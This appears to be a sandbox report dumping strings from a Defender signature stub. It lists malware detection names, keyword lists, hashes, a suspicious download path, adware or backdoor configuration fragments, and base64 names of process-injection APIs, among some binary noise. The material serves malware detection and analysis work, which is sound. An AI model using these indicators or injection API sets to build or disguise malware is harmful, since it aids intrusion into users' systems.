Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: do not use our services or download or use the nicehash mining software.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: zrecommended amd gpu driver version is 15.7.1.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: nconfig file is from an older version of nicehashminer..
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: n[not compatible. update nicehash miner]x
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:virtool:msil/lore!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "!#tel:virtool:msil/lore!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: {11111-22222-50001-00002}x
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#trojan:win32/susdbg.j!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#trojan:win32/susdbg.j!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: obfuscat
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: njrat
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: rootkit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: bootkit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: schost
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dropper
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: zombie
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: flood
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: wiper
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lolbin
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:virtool:win32/ascurlexe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: _ !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:trojandownloader:win32/rottentu.a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 9a4ed3951a48481d942837cd3e280fc2784d07fd@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: c266d01070711fc4fda0d694022c20ae77191dc5@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: c8ca323d0c9632af9f328ce6fa5b8790ef1c35f7@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 6afc5db0292dd03169551863afdccd09b8760c4f@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 571ecc51ce66f295e4c4f4b2736fdd531747d132@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 398f6e93eef6450d8560c2697a064f2f6e8c327c@udp://tracker.coppersurfer.tk:6969l
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: c5e0f497b82de46e8b6804483bc5b6d8e0fbfc80@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 3d32dbdedd4f3afb89c14d270aa32b00807d24f6@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 6f09e5949fe6e61793cc1866f0eab08fa2c73c14@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 9ccf06fc6b337504a48beac323037c4392070b86@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: f7ea963143164ccdd99a3203def29fc762e4d3c7@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 5a337abfb448297e8d521770351d7d312edaedf7@udp://tracker.publicbt.com:80
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %s\ucv\ucv.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: torrent_init
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: torrent_exec
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: torrent_file
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: torrent_filex
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/foxiebro.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:virtool:win32/obfuscator_sirefef_d
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:trojandownloader:win32/hormelex.b3
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d173ad6a9083918ab47fb86f99bdaa58f51136ec6ae83488ab3df90e3ee70222
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 608abf7dafa89f87b47ab8a96c83b951ff31f420b179a54888a75ddc6489ceb8
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: cc77aa5684ff67df1dc273ee1ec4629c49e20525b27aa556a745fd3c4eea65d0
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 88b1609052c0a414cd0fb2d5062df22fd17fb5a64b85e36dfe0da528d563e561
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 86ac639e47cdbda097ef52dc455ad853ca4d4fc4bea446e57ea04b4d934c87
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 6f964d85a6ac9078a96bd630e40ed373ab699bb975e61da8334280d14186c3
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 3ee71dd20579ee5a99588dff2bd00933e45e8cb09746e4082bc216c66eaf97
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0a3be512c84a5ac372bf6fdf063ae21837e30821b01357f267fb3ae55be808
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 1338e919d346221c37ec6fe7074199389e37fe22183290cdae43e5102daa57
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0d3cfa27dd51a39847e315ca012cd375a34ffe22b022b6c76def07608d55d7
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 54fd30e2100270d6063ee2113bce130937ef02749f5ecf0b1acc73b364a1a0
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 6188be75a6a8968cb16086b555ee31da016983ac5df225a650fd26df075e96
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 9943f52cdf52c0a65582bf72ac7687bf689a4537d30f3e5df92f1fd70e5dcf
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 6786b06d9798e45e98ab7ba142f325d60631d70858f5478d4485bc749252e8
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /protect.org.br/phpmailer_5.2.1/test_script/styles/global.zip
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /protect.org.br/phpmailer_5.2.1/test_script/styles/global.zipx
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/falsecobra.b!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /commands/@slp
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /commands/cmd
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: return code %d
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/@name
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/@group
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/@version
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/proxy
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/proxy/@name
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/proxy/@password
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/servers/server[@current='true']
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/servers/server/@current[text()='true']
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/servers/server[text()='%s']/@current
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/servers/server[%d]
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/storage
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/check
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: /settings/interval
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: stg%02d.cab
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 8ivbscriptwww
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: reportdirwww
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: xcfgpathw
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: created by midl version 7.00.0555 at thu apr 12 10:40:03 2018
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: windows check av servicex
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alfper:trojan:win32/fusiondrive.x!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: b0f88de-a9e9-4c82-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 3fb-9162622d747
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 7c93aff-5b96-48be-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: bf1-756b9b34aad
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: adaa7e2-6fce-408e-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e41-f2f0e53122b
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 5fdc637-7136-4511-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 225-3d1d54c1162
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ed70605-5549-4636-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: af6-1a2e7dda747
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 7b46347-aa32-4757-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 55a-e3cda6b5a49
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 8ea0dc9-19a5-40ad-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ba2-5e0640fed7a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: fef5628-28b6-4ff7-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: a74-a0bc1569e24
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: b81f10a-c941-4749-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 269-82ae7a64685
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 1e0d64a-5dfe-4ff0-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 63b-484d24e89a4
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 01919fb-9b75-4adc-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ce5-aeca11ad511
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 9cddcf5-1062-4614-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: b5d-f8cb90fa792
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: f51df4d-b4a9-4473-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 83e-25ccb20dee8
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ddc77cd-21d3-4134-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: b2f-37860852465
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 1d757a7-2e25-43d2-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 20f-d9d1c8b7155
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 7105dd9-73ad-490f-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 96a-64704fb625c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 62a3999-e1c8-4ea5-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 590-7f7b2659099
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 1ca77fa-94d1-4455-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 460-32b095781a9
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0c0bd12-79cf-4e86-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 9e9-347e1715bb4
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 412efe8-384f-4591-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 738-e234e396cd4
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0f6455e-a4a3-4da0-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 4a9-b52981901d1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0d8d09e-a463-4f15-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: b61-c975ff2d1cc
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 8d1c067-2e04-4aa3-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 707-0cf06934ed4
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: de78304-2be5-4357-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 3e1-f4426a350b2
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: access_to_cfg_gp
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: cfg_access
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: networkgp.com
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: access_to_cfg_nb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: gpdcount.php?
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: feedbak_computeckey_saveregstrvalues_error
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: start_downloadexecuteupdater
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: adshow.php?ver=%s&subid=%s&mac=%s
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: start_computeckey
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: computeckey
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ret0compckey
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ret1compckey
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: files required by gabpath have been removed.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:base64encodefunctionmonitorw
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: tw96awxsys80ljagkgnvbxbhdglibgup
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: u2hlbgxfegvjdxrlqq==
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: tg9hzfjlc291cmnl
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: v2lurxhlyw==
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: q3jlyxrluhjvy2vzc0fzvxnlcke=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: u2v0u2vjdxjpdhlezxnjcmlwdg9yrgfjba==
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: qwrkqwnjzxnzqwxsb3dlzefjzq==
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: v1rtuxvlcnltzxnzaw9usw5mb3jtyxrpb25b
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: umvnaxn0zxjtzxj2awnlq3rybehhbmrszxjb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: r2v0u2hvcnrqyxrotmftzue=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: v3jpdgvgawxl
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: r2v0u3lzdgvtrglyzwn0b3j5qq==
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: sw50zxjuzxrszwfkrmlszq==
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: sw1tr2v0q29tcg9zaxrpb25tdhjpbmdb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d2luaw5ldc5kbgw=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ahr0cdov
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: vmlydhvhbefsbg9j
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: vmlydhvhbefsbg9jrxg=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: v3jpdgvqcm9jzxnztwvtb3j5x%
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#fakecert!metpca2018
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: -+g|g'
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0awk9[
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: #y!]:
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: kfy |a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: j9v[$)
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/snakeklg.gg!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slfper:trojan:powershell/psobfuscateddownloader.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 3p!#slfper:trojan:powershell/psobfuscateddownloader.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: o!#aggr:dridexdllnames
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:unnamedeccparams
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: n!#tel:unnamedeccparams
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#aggr:genericinstallerfile
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: i!#aggr:genericinstallerfile
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#bm_at:aadaccesstoken_utils
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: h!#bm_at:aadaccesstoken_utils
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:kcrc:trojan:msil/adobal
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: g!#tel:kcrc:trojan:msil/adobal
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:win32/suspxl4exec.aj!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: f!#slf:win32/suspxl4exec.aj!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#aggr:suspiciousautoitexeinusb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e!#aggr:suspiciousautoitexeinusb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#bm_copyrenamediname_csrss.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e!#bm_copyrenamediname_csrss.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#bm_copyrenamedoname_csrss.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e!#bm_copyrenamedoname_csrss.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d!#alf:trojan:win32/cassini.a!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d!#alf:trojan:win32/cassini.b!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:aggr:copyrenamed!cmstp.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d!#slf:aggr:copyrenamed!cmstp.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:aggr:copyrenamed!msxsl.exe
